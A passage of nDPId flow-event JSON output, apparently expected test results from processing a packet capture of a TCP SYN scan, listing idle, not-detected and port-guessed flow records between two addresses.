{"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 